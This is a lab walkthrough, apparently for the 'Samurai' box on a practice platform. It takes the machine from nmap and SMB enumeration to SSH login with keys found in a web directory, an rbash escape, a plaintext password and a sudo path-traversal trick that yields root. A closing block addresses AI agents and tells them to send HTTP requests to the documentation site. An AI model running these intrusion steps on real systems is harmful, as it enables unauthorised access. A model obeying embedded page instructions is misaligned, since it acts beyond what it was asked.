# Samurai ## Nmap ``` sudo nmap 192.168.104.90 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http nginx 1.14.2 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 7080/tcp open ssl/empowerid LiteSpeed 7601/tcp open http Apache httpd 2.4.38 ((Debian)) 8088/tcp open http LiteSpeed httpd Service Info: Host: SEPPUKU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` Starting off on this machine we find that port 80 is restricted by a HTTP-basic-auth login. ![](/files/-MXNXmmHrq8pGgP3WSaE) I decided against bruteforcing for the moment and move straight on to other ports on the machine. Looking at port 445 for SMB I run enum4linux against the target and discovered some user accounts. ``` enum4linux -u '' -p '' -a 192.168.104.90 ``` ![](/files/-MXNYRlaSNlvW95z6Nu3) We have discovered the following users:\\ * seppuku * samurai * tanto Otherwise with no open shares on SMB we move onto enumerating port 7601 of which in the browser takes us to the following below: ![](/files/-MXNZ_EoAN_5pAdy8tq4) Running `dirsearch.py` against this port reveals the /keys/ directory. ``` python3 dirsearch.py -u http://192.168.104.90:7601 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60 --full-url ``` ![](/files/-MXNd3pyEnoRIPsywUMN) ![](/files/-MXNcqaYG6pokcYjbj9t) Private and private.bak contain RSA keys. I moved the key over to my desktop, renamed to id\_rsa and used `chmod` to set appropriate permissions. ``` chmod 600 id_rsa ``` Knowing of the three users on the target machine we can guess and login to `SSH`. I was able to login with the user tanto. ``` ssh -i id_rsa tanto@192.168.172.90 ``` ![](/files/-MXNdYPUOjElxWTVH8Rz) Once logged in as tanto we see we are restricted in `rbash` and unable to run some commands. I used the following command sequence to first escape `rbash` then export a new path then finally updated to a Python shell again. ``` python -c 'import os; os.system("/bin/sh")' PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin python -c 'import pty; pty.spawn("/bin/bash")' ``` Once we can move around the box again I moved into the seppuku users directory. The file .passwd is of interest and contains the password: `12345685213456!@!@A` This password did not work for the user seppku but I was able to use `su` and the password to login as the user samurai. ![](/files/-MXNeCi55FfmcNjvjUH3) ![](/files/-MXNeHuSEZRraaeSYD3m) I then transferred linpeas over to the attacking machine which soon picked up sudo permissions. ![](/files/-MXOBSkTnpXues2sNvP8) Open another tab and log in as tanto on `SSH` again. The create the directory and file so we can execute as the user samurai. Once the directory and bin file has been created echo in a bash shell then `chmod` to make it executable. ``` mkdir .cgi_bin cd .cgi_bin echo '/bin/bash' > bin chmod 755 bin ``` ![](/files/-MXOCHpotWw8Gysj9e4D) Then on our other tab execute the file with the following command to gain root shell: ``` sudo /../../../../../../home/tanto/.cgi_bin/bin /tmp/* ``` ![](/files/-MXOCVl2UxuCUUkvu5t1) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/samurai.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.